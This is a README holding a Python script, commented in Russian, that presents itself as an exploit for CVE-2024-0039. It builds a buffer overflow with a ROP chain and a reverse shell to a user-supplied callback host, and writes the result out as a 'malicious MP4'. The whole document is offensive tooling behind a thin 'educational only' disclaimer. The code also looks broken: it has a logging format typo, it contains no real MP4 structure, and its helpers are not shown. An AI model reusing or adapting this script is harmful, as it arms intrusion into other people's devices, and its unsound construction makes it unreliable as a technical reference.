README.md
Rendering markdown...
#!/usr/bin/env python
# ЭКСПЛОИТ ДЛЯ CVE-2024-0039
#
# ВНИМАНИЕ: Этот код предназначен только для образовательных целей.
# Никакие злонамеренные действия с использованием этого кода не допускаются.
# Используйте на свой страх и риск.
#
# "С большой силой приходит большая ответственность." - Дядя Бен
#
# Описание:
# Этот скрипт создает MP4 файл, содержащий вредоносную нагрузку,
# которая эксплуатирует уязвимость CVE-2024-0039, позволяя выполнить произвольный код.
#
# Автор: 41yn41
import socket
import struct
import argparse
import sys
import logging
from utils.helpers import create_rop_chain, create_reverse_shell
# Настраиваем логирование (да, мы серьезны!)
logging.basicConfig(filename='logs/exploit.log', level=logging.INFO,
format='%(asctime)s - %(levellevel)s - %(message)s')
def create_malicious_payload(cb_host, cb_port):
"""Создание вредоносного полезного груза с обратным подключением.
Аргументы:
cb_host -- IP-адрес для обратного подключения.
cb_port -- Порт для обратного подключения.
Возвращает:
Полезный груз в виде байтов.
"""
logging.info("Создаем ROP цепочку (без магии тут не обошлось)")
rop_chain = create_rop_chain()
logging.info("Создаем переполнение буфера (и заполняем его буквой 'A', потому что можем)")
payload = b"A" * 1000 # Наполняем буфер "A"-шками, потому что почему бы и нет?
payload += rop_chain
logging.info("Создаем полезную нагрузку для обратного подключения (не пытайтесь это дома)")
reverse_shell = create_reverse_shell(cb_host, cb_port)
payload += reverse_shell
return payload
def write_to_file(filename, content):
"""Запись содержимого в файл.
Аргументы:
filename -- Имя файла для записи.
content -- Содержимое для записи.
"""
logging.info(f"Запись полезного груза в файл {filename} (да, мы это сделали!)")
with open(filename, 'wb') as f:
f.write(content)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Эксплоит для CVE-2024-0039")
parser.add_argument('--cb-host', required=True, help="Хост для обратного подключения")
parser.add_argument('--cb-port', required=True, type=int, help="Порт для обратного подключения")
parser.add_argument('--output', default='exploit.mp4', help="Имя выходного файла с вредоносным MP4")
args = parser.parse_args()
logging.info("Создание вредоносного полезного груза (готовьтесь к магии!)")
payload = create_malicious_payload(args.cb_host, args.cb_port)
write_to_file(args.output, payload)
logging.info(f"Эксплоит успешно записан в {args.output} (мы это сделали!)")
print(f"[+] Эксплоит записан в {args.output}")